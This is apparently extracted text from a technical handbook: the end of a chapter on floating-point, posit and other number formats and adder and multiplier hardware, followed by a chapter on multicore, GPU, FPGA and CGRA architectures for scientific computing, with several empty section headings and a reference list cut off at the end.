It has been nearly impossible to develop hardware arithmetic units that are fully
compliant with the IEEE 754 standard (Nandy et al. 2010; Merchant et al. 2016). This is
mainly due to the complexities involved in the standard. The standard defines a few
special cases, such as subnormal numbers and infinity, which make full hardware
implementations expensive; hence, some of the functionality is implemented in
software. This approach results in performance and energy penalties.
Subnormal Numbers
Formerly known as denormal numbers, subnormal numbers are used to represent
numbers that are not representable with the minimum exponent (expmin). Numbers
whose exponent would be smaller than expmin are represented by shifting the mantissa
to the right. Also, the representation uses an implicit leading zero instead of one. The
phenomenon of approaching zero by right-shifting the fractional part is referred to as
gradual underflow.
There are several performance-related issues in incorporating subnormal num-
bers. As per the study presented in Schwarz et al. (2003), the performance of
subnormal arithmetic when implemented entirely in hardware is comparable to that
of normal floating-point performance. This is due to hardware techniques employed
for the performance improvement. When implemented in software, the performance
of the arithmetic on subnormal numbers is significantly slower compared to the
performance of normal floating-point arithmetic. Researchers have also identified
that the slower speed can also create a timing channel and possible security
leak (Andrysco et al. 2015).
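Gradual underflow can be observed directly in IEEE 754 double precision; the following Python sketch shows that halving the smallest normal number yields a subnormal rather than zero, and that precision is eventually exhausted:

```python
import sys

smallest_normal = sys.float_info.min   # 2.2250738585072014e-308
tiny = smallest_normal / 2             # below exp_min: stored as a subnormal
print(tiny)                            # 1.1125369292536007e-308
print(tiny > 0.0)                      # True: gradual underflow, not a flush to zero

# Precision degrades as the significand is shifted further right
print(smallest_normal / 2**52)         # 5e-324, the smallest positive subnormal
print(smallest_normal / 2**53)         # 0.0: past the last subnormal, we hit zero
```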
Exceptions
The IEEE 754 standard defines five exceptions. The exception flag is raised when
the exception occurs. Handling of the exceptions has been application-specific.
Quiet NaN
Quiet NaNs (qNaNs) propagate through the operations without generating any
exceptions. However, certain operations, such as format conversions and compar-
ison operations that cannot be performed on NaNs, generate exceptions.
Signaling NaN
Signaling NaNs (sNaNs) generate an exception and are then quieted in the process if
appropriate. Handling sNaNs is a complex procedure.
In general, there have been several ambiguities in the handling of NaNs in a
program. Also, there has been confusion in the handling of qNaNs and sNaNs. In
the IEEE 754 standard, NaNs are encoded by all ones in the exponent bits and a
nonzero fractional part, irrespective of the sign bit. If all the exponent bits are ones
and the fractional bits are all zeros, the bit pattern is regarded as infinity. Infinity
arises in arithmetic operations such as overflow and division by zero.
Rounding Modes
The IEEE 754 standard defines five rounding modes.
1. Round to nearest, ties to even: In this mode, the number is rounded to the nearest
number. If the number falls exactly between the two numbers, the number is
rounded to the nearest value with an even least significant digit.
2. Round to nearest, ties away from zero: In this mode, the number is rounded to the
nearest number. If the number falls midway, it is rounded up in case of a positive
number and rounded down in case of a negative number.
3. Round to zero: In this mode, the number is truncated.
4. Round to +∞: In this mode, the number is rounded up.
5. Round to −∞: In this mode, the number is rounded down.
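Python’s decimal module (a radix-10 library) exposes rounding modes analogous to the five listed above, which makes them easy to experiment with; a minimal sketch:

```python
from decimal import (Decimal, ROUND_HALF_EVEN, ROUND_HALF_UP,
                     ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR)

x = Decimal("2.5")  # an exact tie between 2 and 3
for mode in (ROUND_HALF_EVEN, ROUND_HALF_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR):
    print(mode, x.quantize(Decimal("1"), rounding=mode))
# ROUND_HALF_EVEN 2   -- round to nearest, ties to even
# ROUND_HALF_UP   3   -- round to nearest, ties away from zero
# ROUND_DOWN      2   -- round toward zero (truncate)
# ROUND_CEILING   3   -- round toward +infinity
# ROUND_FLOOR     2   -- round toward -infinity
```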
Posit Arithmetic
Posit arithmetic has been proposed as a drop-in replacement for IEEE 754 compliant
arithmetic. It is claimed that the posit format offers several advantages over its
IEEE 754 compliant counterpart of the same size: an m-bit posit number packs more
information per bit than an m-bit IEEE 754 compliant number, where m can be any
of the bit widths supported by the IEEE 754 standard. The posit format has only one
exception, called Not-a-Real (NaR) (Fig. 6).
Since its inception in 2017 by John Gustafson (Gustafson and Yonemoto 2017),
there have been several studies on posit. Broadly, these studies can be classified as
hardware-based investigations and software-based analyses. In the hardware-based
implementations, there have been general-purpose parametric designs (Chaurasiya
et al. 2018) and application-specific designs (Nambi et al. 2020). The software and
application analyses are carried out using either SoftPosit (Cerlane Leong 2018)
or Universal (Omzigt et al. 2018). A preliminary study of posits vis-à-vis floats
suggests that the numbers represented in posit format are more tolerant to single
and double bit-flips compared to their IEEE 754 compliant counterparts (Alouani
et al. 2021). In the case of bit-flips, the probability that a number will result in NaN
is much higher in floats compared to posits.
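The encoding of a posit (a sign, a run-length-encoded regime, up to es exponent bits, and a fraction with a hidden one) can be made concrete with a small decoder. The following Python sketch follows Gustafson and Yonemoto (2017) for an n-bit posit with es exponent bits; it is an illustrative model, not a hardware-faithful implementation:

```python
def decode_posit(bits: int, n: int = 8, es: int = 1) -> float:
    """Decode the integer bit pattern of an n-bit posit with es exponent bits."""
    if bits == 0:
        return 0.0
    if bits == 1 << (n - 1):
        return float("nan")                  # NaR, the single posit exception
    sign = -1.0 if bits >> (n - 1) else 1.0
    if sign < 0:
        bits = (-bits) & ((1 << n) - 1)      # negative posits are two's complemented
    body = bits & ((1 << (n - 1)) - 1)       # everything after the sign bit
    # Regime: a run of identical bits, terminated by its complement
    first = (body >> (n - 2)) & 1
    run, i = 0, n - 2
    while i >= 0 and ((body >> i) & 1) == first:
        run += 1
        i -= 1
    k = run - 1 if first == 1 else -run
    i -= 1                                   # skip the regime terminating bit
    # Exponent: up to es bits, zero-padded if the posit runs out of bits
    exp = 0
    for _ in range(es):
        exp <<= 1
        if i >= 0:
            exp |= (body >> i) & 1
            i -= 1
    # Fraction: the remaining bits, with an implicit leading 1
    frac_bits = i + 1
    if frac_bits > 0:
        significand = 1.0 + (body & ((1 << frac_bits) - 1)) / (1 << frac_bits)
    else:
        significand = 1.0
    useed = 2 ** (2 ** es)
    return sign * (useed ** k) * (2.0 ** exp) * significand

print(decode_posit(0b01000000))   # 1.0
print(decode_posit(0b01100000))   # 4.0: regime k=1, useed=4 for es=1
```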
To facilitate hardware–software-arithmetic codesign, there have been a few posit
hardware implementations integrated into a RISC-V core. A qualitative comparison
of the implementations is shown in Table 2. The only implementation that supports
the quire is Clarinet, which adds custom posit instructions; the rest of the
implementations leverage the floating-point instructions for posit hardware utilization.
One distinguishing feature of posit is its support for the quire. The quire accumulator
is a functionality that can be implemented in software or hardware. Software libraries
such as SoftPosit (Cerlane Leong 2018) and Universal (Omzigt et al. 2018) support
the quire in software, while Clarinet, presented in Sharma et al. (2023), supports a
quire register as a hardware feature. The format of the quire register is shown in
Fig. 7; it is similar to the fixed-point format, with a carry-guard as an extra field.
Other Formats
Since the inception of floating-point arithmetic, there have been a variety of number
format proposals in the literature. Here, some of them are covered.
BF16
The bfloat16 (BF16) format is the truncated version of IEEE 754 single-precision
floating-point format (see Fig. 8). The BF16 format was particularly designed to
accelerate machine learning, especially training, and near-sensor computing (Tagli-
avini et al. 2018).
The format retains the 8 exponent bits of the IEEE 754 single-precision format, while
it supports only 8 bits of precision (7 explicit fraction bits), resulting in reduced
accuracy. The BF16 format has a higher dynamic range and lower precision compared
to the half-precision format (binary16). BF16 numbers are not usable for integer
calculations.
Similar to IEEE 754 compliant formats, many binary bit patterns (256) are spent on
defining the NaN encodings. Also, the BF16 format defines two bit patterns for
+∞ and −∞ and two bit patterns for +0 and −0. The precision of BF16 is between
two and three decimal digits.
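Because BF16 is simply the top half of a binary32, conversion can be sketched with two bit-level helpers. The version below truncates (production converters usually round to nearest even instead):

```python
import struct

def to_bf16_bits(x: float) -> int:
    """Truncate an IEEE 754 binary32 to bfloat16 by keeping its top 16 bits."""
    (bits,) = struct.unpack(">I", struct.pack(">f", x))
    return bits >> 16                 # 1 sign + 8 exponent + 7 fraction bits remain

def from_bf16_bits(b: int) -> float:
    """Widen a bfloat16 back to binary32 by zero-filling the lost fraction bits."""
    return struct.unpack(">f", struct.pack(">I", b << 16))[0]

x = 3.14159265
print(from_bf16_bits(to_bf16_bits(x)))   # 3.140625: only ~2-3 decimal digits survive
```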
Several vendors have adopted BF16 for their platforms. For example, Intel has
adopted it for its Nervana and FPGAs (Intel Unveils Nervana Neural Net L-1000
for accelerated AI training 2020). Other major vendors such as Google, ARM, and
AMD have also released products based on BF16 format.
TensorFlow-32
TensorFlow-32 (TF32) is a math mode introduced in NVIDIA A100 GPUs. The cores
run TF32 arithmetic, which has 10 bits in the fractional part and 8 bits in the
exponent (HPC up to 20x TensorFloat-32 in the A100 GPU Accelerates AI Training
2020). The aim is to strike a balance between performance and the accuracy required
for machine learning training.
There have been other formats such as Microsoft Binary Format (MBF), mini-
float, and IBM Hexadecimal Floating Point (HFP) in the literature. However, with
the standardization of floating-point format, the IEEE 754 standard implementations
were preferred over other formats, except for machine learning applications, where
customized formats are more popular.
Hardware Implementations
Adders
Ripple-Carry Adder
To add two N -bit numbers, multiple full-adders can be cascaded where carry ripples
through these adders (see Fig. 10). Cin of each adder is Cout of the previous adder.
The first full-adder can be replaced by a half-adder in a ripple-carry adder assuming
that Cin for the N-bit adder is 0. A ripple-carry adder is generally slow since each
full-adder must wait for its carry input before it can process the operation. This
carry chain forms the critical path in the adder. Furthermore, each full-adder
requires three levels of logic (see Fig. 9
(right)).
Fig. 9 Binary half- (left) and full-adders (right) and their respective truth tables
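The behavior of the carry chain can be made concrete with a small bit-level simulation. The following Python sketch (a behavioral model, not a gate-level netlist) cascades N full-adders exactly as described above:

```python
def full_adder(a: int, b: int, cin: int):
    """One full-adder: sum and carry-out from two operand bits and a carry-in."""
    s = a ^ b ^ cin
    cout = (a & b) | (cin & (a ^ b))
    return s, cout

def ripple_carry_add(a: int, b: int, n: int = 8):
    """Add two n-bit numbers by rippling the carry through n full-adders."""
    carry, result = 0, 0
    for i in range(n):  # the sequential loop mirrors the serial carry chain
        s, carry = full_adder((a >> i) & 1, (b >> i) & 1, carry)
        result |= s << i
    return result, carry  # carry is the final carry-out

print(ripple_carry_add(0b10110101, 0b01001011))  # (0, 1): 181 + 75 overflows 8 bits
```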
Carry-Lookahead Adder
A carry-lookahead adder (CLA) overcomes the performance issue in the ripple-
carry adder by processing the carry bit faster. The CLA computes one or more carry
bits before the sum, which reduces the wait time for the carry bits, resulting in faster
addition. Konrad Zuse implemented the first CLA (Rojas 2014). The Kogge–Stone adder
(KSA) and the Brent–Kung adder (BKA) are types of CLA (Fig. 11).
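The lookahead idea rests on per-bit generate and propagate terms, g_i = a_i AND b_i and p_i = a_i XOR b_i, from which every carry follows as c_{i+1} = g_i OR (p_i AND c_i). The recurrence below is written as a loop for readability; in a hardware CLA it is flattened into shallow parallel logic so that all carries are available without rippling:

```python
def carry_lookahead_add(a: int, b: int, n: int = 8):
    """Compute all carries from generate/propagate terms, then form the sums."""
    g = [((a >> i) & 1) & ((b >> i) & 1) for i in range(n)]    # g_i = a_i AND b_i
    p = [((a >> i) & 1) ^ ((b >> i) & 1) for i in range(n)]    # p_i = a_i XOR b_i
    c = [0] * (n + 1)                                          # c_0 = 0
    for i in range(n):
        c[i + 1] = g[i] | (p[i] & c[i])   # flattened into parallel logic in hardware
    result = sum((p[i] ^ c[i]) << i for i in range(n))         # s_i = p_i XOR c_i
    return result, c[n]

print(carry_lookahead_add(0b10110101, 0b01001011))  # (0, 1), matching the ripple adder
```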
Multipliers
The multiplier plays a key role in the arithmetic logic unit (ALU) of a central
processing unit (CPU). The early implementations of multipliers were software-based,
using adder circuits; however, with the advent of hardware–software codesign
techniques, more sophisticated hardware blocks were established. This resulted in
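The shift-and-accumulate “multiplier routine” mentioned in the introduction can be sketched in a few lines; each set bit of the multiplier contributes one shifted partial product:

```python
def shift_add_multiply(a: int, b: int) -> int:
    """Multiply two nonnegative integers by accumulating shifted partial products."""
    product, shift = 0, 0
    while b:
        if b & 1:                    # this multiplier bit contributes a partial product
            product += a << shift    # the multiplicand, shifted into position
        b >>= 1
        shift += 1
    return product

print(shift_add_multiply(13, 11))    # 143
```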
Dividers
Square Root
Conclusion
There have been several proposals in the literature for different formats, and standardization
efforts have been made to ensure uniformity and reproducibility. Especially for
the floating-point arithmetic, the efforts have been significant due to the floating-
point architectures’ hardware complexities. Later, the computer architects diverged
to more optimized arithmetic formats suitable for the applications. Several new
formats were invented, such as TF32, posit, and bfloat16, that are envisioned as
replacements for IEEE 754 compliant formats. Hardware design for these new formats
has been challenging since application areas such as edge computing require
extremely small area and energy footprints. Also, with the arrival of post-CMOS
technologies in the offing, there are several research opportunities in identifying
the right format that fits the novel
technologies.
References
Alouani I, Ben Khalifa A, Merchant F, Leupers R (2021) An investigation on inherent robustness of
posit data representation. In: Proceedings of the international conference on vlsi design (VLSID)
Andrysco M, Kohlbrenner D, Mowery K, Jhala R, Lerner S, Shacham H (2015) On subnormal
floating point and abnormal timing. In: 2015 IEEE symposium on security and privacy, pp 623–
639
Calligo Technologies (2020) Posit Numeric Unit (PNU-IP). https://calligotech.com/posit-numeric-
unit-pnu-ip/. Accessed 17 Dec 2020
Cerlane Leong (2018) Softposit version 0.4.1rc
Chaurasiya R, Gustafson J, Shrestha R, Neudorfer J, Nambiar S, Niyogi K, Merchant F, Leupers
R (2018) Parameterized posit arithmetic hardware generator. In: 2018 IEEE 36th International
conference on computer design (ICCD), pp 334–341
Garner HL (1976) A survey of some recent contributions to computer arithmetic. IEEE Trans
Comput C-25(12):1277–1282
Goldberg D (1991) What every computer scientist should know about floating-point arithmetic.
ACM Comput Surv 23(1):5–48
Guntoro A, De La Parra C, Merchant F, De Dinechin F, Gustafson JL, Langhammer M, Leupers R,
Nambiar S (2020) Next generation arithmetic for edge computing. In: 2020 Design, automation
test in Europe conference exhibition (DATE), pp 1357–1365
Gustafson JL, Yonemoto I (2017) Beating floating point at its own game: posit arithmetic.
Supercomput Front Innov Int J 4(2):71–86
Hasnat A, Bhattacharyya T, Dey A, Halder S, Bhattacharjee D (2017) A fast FPGA based
architecture for computation of square root and inverse square root. In: 2017 Devices for
integrated circuit (DevIC), pp 383–387
Hemmert KS, Underwood KD (2007) Floating-point divider design for FPGAs. IEEE Trans Very
Large Scale Integr VLSI Syst 15(1):115–118
HPC up to 20x TensorFloat-32 in the A100 GPU Accelerates AI Training (2020) https://blogs.
nvidia.com/blog/2020/05/14/tensorfloat-32-precision-format/. Accessed 17 Dec 2020
IEEE Standard for Binary Floating-Point Arithmetic (1985) ANSI/IEEE Std 754-1985, pp 1–20
IEEE Standard for Floating-Point Arithmetic (2008) IEEE Std 754-2008, pp 1–70
IEEE Standard for Floating-Point Arithmetic (2019) IEEE Std 754-2019 (Revision of IEEE 754-
2008), pp 1–84
IEEE Standard for Radix-Independent Floating-Point Arithmetic (1987) ANSI/IEEE Std 854-
1987, pp 1–19
Intel (2021) 8087 Math Coprocessor. http://pdf.datasheetcatalog.com/datasheets/2300/45014_DS.
pdf. Accessed 22 Jan 2021
Intel Unveils Nervana Neural Net L-1000 for Accelerated AI Training (2020) https://venturebeat.
com/2018/05/23/intel-unveils-nervana-neural-net-l-1000-for-accelerated-ai-training/. Accessed
17 Dec 2020
Ken Shirriff’s Blog (2021) 8087 Math Coprocessor Die. http://www.righto.com/2020/05/
extracting-rom-constants-from-8087-math.html. Accessed 22 Jan 2021.
Liu W, Lombardi F, Shulte M (2020) A retrospective and prospective view of approximate
computing [Point of View]. Proc IEEE 108(3):394–399
Marasa JD, Matula DW (1973) A simulative study of correlated error propagation in various finite-
precision arithmetics. IEEE Trans Comput C-22(6):587–597
Merchant F, Choudhary N, Nandy SK, Narayan R (2016) Efficient realization of table look-up
based double precision floating point arithmetic. In: 2016 29th International conference on VLSI
design and 2016 15th International conference on embedded systems (VLSID), pp 415–420
Mopuri S, Acharyya A (2017) Low-complexity methodology for complex square-root computa-
tion. IEEE Trans Very Large Scale Integr VLSI Syst 25(11):3255–3259
Muller J-M, Brunie N, de Dinechin F, Jeannerod C-P, Joldes M, Lefèvre V, Melquiond G, Revol
N, Torres S (2018) Handbook of floating-point arithmetic, 2nd edn. Springer
Nambi S, Ullah S, Lohana A, Sahoo SS, Merchant F, Kumar A (2020) ExPAN(N)D:
exploring posits for efficient artificial neural network design in FPGA-based systems
Nandy S, Balakrishnan S, Merchant F, Baluni A (2010) A fully pipelined modular multiple
precision floating point multiplier with vector support. In: 2010 International symposium on
electronic system design, Los Alamitos, Dec 2011. IEEE Computer Society, pp 45–50
Obermann SF, Flynn MJ (1997) Division algorithms and implementations. IEEE Trans Comput
46(8):833–854
Omzigt T (2018) Universal: a header-only C++ template library for universal number arithmetic
Palmer JF (1980) The Intel 8087 numeric data processor. In: International workshop on managing
requirements knowledge, Los Alamitos. IEEE Computer Society, p 887
Rojas R (2014) The Z1: architecture and algorithms of Konrad Zuse’s first computer. CoRR,
abs/1406.1886
Saxena V, Merchant F, Reddy A, Gustafson JL, Jonathan N, Sangeeth N, Leupers R (2021)
Brightening the optical flow through posit arithmetic. In: International symposium on quality
electronic design (ISQED)
Schwarz EM, Schmookler M, Trong SD (2003) Hardware implementations of denormalized
numbers. In: Proceedings 2003 16th IEEE symposium on computer arithmetic, pp 70–78
Sharma NN, Jain R, Pokkuluri MM, Patkar SB, Leupers R, Nikhil RS, Merchant F (2023)
Clarinet: a quire-enabled RISC-V-based framework for posit arithmetic empiricism. J Syst
Archit 135:102801
Swartzlander EE, Alexopoulos AG (1975) The sign/logarithm number system. IEEE Trans Comput
C-24(12):1238–1242
Tagliavini G, Mach S, Rossi D, Marongiu A, Benini L (2018) A transprecision floating-point
platform for ultra-low power computing. In: 2018 Design, automation test in Europe conference
exhibition (DATE), pp 1051–1056
ThoughtWorks (2020) Posit Enhanced Rocket Chip (PERC). https://www.thoughtworks.com/
engineering-research/perc. Accessed 17 Dec 2020
Tiwari S, Gala N, Rebeiro C, Kamakoti V (2019) PERI: a posit enabled RISC-V core, pp 1–14
Ugurdag HF, de Dinechin F, Gener YS, Gören S, Didier L-S (2017) Hardware division by small
integer constants. IEEE Trans Comput 66(12):2097–2110
12 Architectures for Scientific Computing
Farhad Merchant
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402
Definitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403
Scientific Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403
Multicore Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Manycore Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Field-Programmable Gate Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Coarse-Grained Reconfigurable Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Custom Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
Multicore Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
General Purpose Graphics Processing Units . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
Field-Programmable Gate Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Coarse-Grained Reconfigurable Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
Abstract
F. Merchant ()
University of Groningen, Groningen, The Netherlands
e-mail: [email protected]
Introduction
Definitions
To understand the concepts better, a few fundamental definitions are presented in
the following section.
Scientific Computing
Multicore Architectures
Manycore Architectures
Manycore processors are a class of multicore processors where the processor cores
are simplified. The cores are mostly small, with minimal control circuitry and small
local memories. A host computer is required to schedule computations on a manycore
architecture. Manycore processor architectures offer a higher degree of explicit
parallelism (see Fig. 3), which scientific computing code can then exploit. Manycore
processors typically lack coherent caches and instead rely on concepts such as
message passing, direct memory access, and partitioned global address spaces. GPUs
are one example of manycore processors.
Fig. 5 A generic coarse-grained reconfigurable architecture with function units and network-on-chip
Custom Architectures
Custom integrated circuits are less preferred as a computing substrate for scientific
computing due to their lack of flexibility. However, tailored designs, combined with
reprogrammable/reconfigurable fabric, are used to accelerate target scientific
computing workloads. CGRAs are one such example.
Multicore Architectures

General Purpose Graphics Processing Units
Graphics processing units (GPUs) are a class of manycore architectures. GPUs were
originally developed for graphics processing, especially shaders, while applications
were executed on a central processing unit (also known as a host machine). The
advent of GPUs dates back to the 1970s–1980s when the target application was
video games. Originally, shading languages were used to program GPUs. In a
typical CPU-GPU architecture, GPUs were external, connected to the CPU through
a bus such as PCI Express (see Fig. 7). Initial GPUs did not support floating-point
arithmetic.
In the early 2000s, general-purpose computing on GPUs became popular. This
was due to the improved programmable shaders and support for floating-point
arithmetic on GPUs. It was observed that GPUs are well suited to applications
that involve matrix computations (Krüger and Westermann 2003; Bolz et al. 2003).
Historically, GPUs were programmed using OpenGL or DirectX. Both provide
application programming interfaces for writing application code. However, both
interfaces target graphics, and hence programming them for general-purpose
computing was cumbersome, as it required knowledge of graphics concepts. Later,
the advent of the compute unified device architecture (CUDA) allowed programmers
to ignore graphics concepts and instead think in terms of high-performance
computing concepts while programming GPUs. In the following, some of the
concepts of GPUs that assist in scientific computing are described.
Arithmetic format support GPUs targeted for graphics processing mostly supported
integer arithmetic ranging from 8 to 32 bits. However, repurposing GPUs for
scientific computing required them to support floating-point formats, as most
scientific applications require 32- or 64-bit floating-point computations.
Incorporating high-precision floating-point hardware on GPUs gave rise to a
trade-off between accuracy and performance, two contrasting goals that are both
extremely important for scientific computing.
Vectorization Since most GPUs were repurposed for applications that consist of
matrix computations, vectorization support became an obvious requirement. This
gave rise to single-instruction multiple-data (SIMD) support on GPUs.
Fig. 7 CPU-GPU (heterogeneous) architecture
Caches Traditionally, GPUs used for graphics processing did not require caches,
mainly because the data they processed was streamed out to the display. However,
once GPUs were repurposed for general-purpose computing, the need for caches
became apparent, as data locality became critical.
Register files Most state-of-the-art GPUs support large register files due to
vectorization. In addition, large register files reduce context-switching latency.
In libraries such as MAGMA, the computation is divided into tasks of varying
granularity. These tasks are then scheduled on the heterogeneous system statically
or dynamically. Nonparallelizable tasks are executed on the CPU, while
parallelizable tasks in the form of Level-2 or Level-3 BLAS operations are
scheduled on GPUs. MAGMA is a high-performance linear algebra library for
heterogeneous architectures and supports various formats such as single precision
(S), double precision (D), single-precision complex (C), and double-precision
complex (Z).
CUBLAS is a CUDA-based BLAS library developed by NVIDIA that supports
Level-1 (vector–vector), Level-2 (matrix–vector), and Level-3 (matrix–matrix)
operations. The CUBLAS library is highly optimized for NVIDIA GPUs.
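To make the three BLAS levels concrete, the sketch below expresses one representative routine per level in Python with NumPy. This is illustrative pseudocode only, not GPU code; actual CUBLAS routines (e.g., cublasSaxpy, cublasSgemv, cublasSgemm) perform the corresponding operations on the GPU.

    import numpy as np

    def axpy(alpha, x, y):
        # Level-1 BLAS (vector-vector): y <- alpha*x + y
        return alpha * x + y

    def gemv(A, x):
        # Level-2 BLAS (matrix-vector): y <- A*x
        return A @ x

    def gemm(A, B):
        # Level-3 BLAS (matrix-matrix): C <- A*B
        return A @ B

    x, y = np.ones(4), np.arange(4.0)
    A, B = np.eye(4), np.full((4, 4), 2.0)
    print(axpy(2.0, x, y), gemv(A, x), gemm(A, B), sep="\n")

Level-3 operations are the most attractive for GPU offload because their arithmetic intensity (operations per byte moved) is highest.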
Field-Programmable Gate Arrays

Classical computing platforms such as multicores and GPUs are capable of exploiting
coarse-grained parallelism in scientific computing workloads. FPGAs are capable of
exploiting both fine-grained and coarse-grained parallelism. Furthermore, FPGAs
offer unique advantages compared to CPUs and GPUs (Kestur et al. 2010), namely low
latency, high performance, and superior energy efficiency. On the other hand, there
are a few challenges involved in implementing a scientific computing application
on an FPGA:
• Long specification-to-deployment time: This is mainly due to the time required
to program FPGAs using hardware description languages.
• Hardware debugging: Since designs are implemented in hardware description
languages, debugging becomes tedious. Many FPGA vendors lack adequate support for
debugging designs on FPGAs, which leads to time-consuming trial-and-error methods.
• Limited resources: Often, the amount of FPGA resources is not sufficient to
implement an entire design on a single FPGA. This forces the use of an FPGA
cluster, which impacts performance, or requires a complex data-scheduling
mechanism to reuse resources, which creates a similar performance bottleneck.
In recent years, C- and OpenCL-based front ends have become available for
programming FPGAs, in addition to the traditional hardware-description-language
front ends. This has made FPGAs considerably more popular for high-performance
scientific codes (De Matteis et al. 2020).
Coarse-Grained Reconfigurable Architectures

CGRAs offer a unique balance between flexibility and performance. They occupy
the middle ground between fixed-function custom integrated circuits and fully
programmable/reconfigurable architectures such as multicores or FPGAs. For this
reason, CGRAs have become popular for embedded and scientific computing
applications. Another major advantage of CGRAs is their array-like structure,
making them highly suitable for matrix computations (Tan et al. 2022) (see Fig. 9).

Fig. 9 4 × 4 matrix scheduling on a systolic array for classical and column-wise Givens rotation. (Reproduced from Merchant et al. 2014)

In particular, CGRAs are amenable to systolic scheduling, as suggested by the
authors in Merchant et al. (2014), Rákossy et al. (2014b), and Mahadurkar et al.
(2014). Despite the promise of CGRAs for scientific computing applications,
large-scale deployment remains a challenge.
Due to many of these challenges, the adoption of CGRAs for scientific applications
remains limited. On the other hand, many CGRA-like architectures have been adopted
in embedded computing, where workloads are deterministic and constrained.
Conclusion
References
Anderson E, Bai Z, Bischof C, Blackford S, Demmel J, Dongarra J, Du Croz J, Greenbaum A,
Hammarling S, McKenney A, Sorensen D (1999) LAPACK users’ guide, 3rd edn. SIAM,
Philadelphia
Anderson J, Beidas R, Chacko V, Hsiao H, Ling X, Ragheb O, Wang X, Yu T (2021) CGRA-
ME: an open-source framework for CGRA architecture and cad research: (invited paper). In:
2021 IEEE 32nd international conference on application-specific systems, architectures and
processors (ASAP), pp 156–162
Asanovic K, Bodik R, Demmel J, Keaveny T, Keutzer K, Kubiatowicz J, Morgan N, Patterson D,
Sen K, Wawrzynek J, Wessel D, Yelick K (2009) A view of the parallel computing landscape.
Commun ACM 52(10):56–67
Bates PD, Lane SN, Ferguson RI (2005) Computational fluid dynamics: applications in environ-
mental hydraulics. Wiley, New York
Blackford LS, Choi J, Cleary A, D’Azeuedo E, Demmel J, Dhillon I, Hammarling S, Henry G,
Petitet A, Stanley K, Walker D, Whaley RC, Dongarra JJ (1997) ScaLAPACK user’s guide.
Society for Industrial and Applied Mathematics, Philadelphia
Bohr M (2007) A 30 year retrospective on Dennard’s MOSFET scaling paper. IEEE Solid-State
Circuits Soc Newsl 12(1):11–13
Bolz J, Farmer I, Grinspun E, Schröder P (2003) Sparse matrix solvers on the GPU: conjugate
gradients and multigrid. ACM Trans Graph 22(3):917–924
Cong J, Huang H, Ma C, Xiao B, Zhou P (2014) A fully pipelined and dynamically com-
posable architecture of CGRA. In: 2014 IEEE 22nd annual international symposium on
field-programmable custom computing machines, pp 9–16
Dai G, Huang T, Chi Y, Xu N, Wang Y, Yang H (2017) ForeGraph: exploring large-scale graph
processing on multi-FPGA architecture. In: Proceedings of the 2017 ACM/SIGDA international
symposium on field-programmable gate arrays, FPGA’17. Association for Computing Machin-
ery, New York, pp 217–226
Das S, Madhu K, Krishna M, Sivanandan N, Merchant F, Natarajan S, Biswas I, Pulli A, Nandy SK,
Narayan R (2014) A framework for post-silicon realization of arbitrary instruction extensions
on reconfigurable data-paths. J Syst Archit 60(7):592–614
Dongarra J, Gates M, Haidar A, Kurzak J, Luszczek P, Wu P, Yamazaki I, Yarkhan A, Abalenkovs
M, Bagherpour N, Hammarling S, Šístek J, Stevens D, Zounon M, Relton SD (2019)
Plasma: parallel linear algebra software for multicore using OpenMP. ACM Trans Math Softw
45(2):16:1–16:35
Dongarra JJ, Luszczek P (2011) PLASMA. In: Padua DA (ed) Encyclopedia of parallel computing.
Springer, pp 1568–1570
Goetting E, Schultz D, Parlour D, Frake S, Carpenter R, Abellera C, Leone B, Marquez D,
Palczewski M, Wolsheimer E, Hart M, Look K, Voogel M, West G, Tong V, Chang A, Chung
D, Hsieh W, Farrell L, Carter W (1995) A sea-of-gates FPGA. In: Proceedings ISSCC ’95 –
international solid-state circuits conference, pp 110–111
Higham NJ (1993) Handbook of writing for the mathematical sciences. SIAM, Philadelphia
Jaiyeoba W, Elyasi N, Choi C, Skadron K (2023) Acts: a near-memory FPGA graph processing
framework. In: Proceedings of the 2023 ACM/SIGDA international symposium on field
programmable gate arrays, FPGA’23. Association for Computing Machinery, New York,
pp 79–89
Kestur S, Davis JD, Williams O (2010) BLAS comparison on FPGA, CPU and GPU. In: 2010 IEEE
computer society annual symposium on VLSI, pp 288–293
Krüger J, Westermann R (2003) Linear algebra operators for GPU implementation of numerical
algorithms. ACM Trans Graph 22(3):908–916
Mahadurkar M, Merchant F, Maity A, Vatwani K, Munje I, Gopalan N, Nandy SK, Narayan R
(2014) Co-exploration of NLA kernels and specification of compute elements in distributed
memory CGRAs. In: XIVth international conference on embedded computer systems: architec-
tures, modeling, and simulation, SAMOS 2014, Agios Konstantinos, Samos, 14–17 July 2014.
IEEE, pp 225–232
De Matteis T, de Fine Licht J, Hoefler T (2020) FBLAS: streaming linear algebra on FPGA.
In: SC20: international conference for high performance computing, networking, storage and
analysis, pp 1–13
Merchant F, Chattopadhyay A, Garga G, Nandy SK, Narayan R, Gopalan N (2014) Efficient
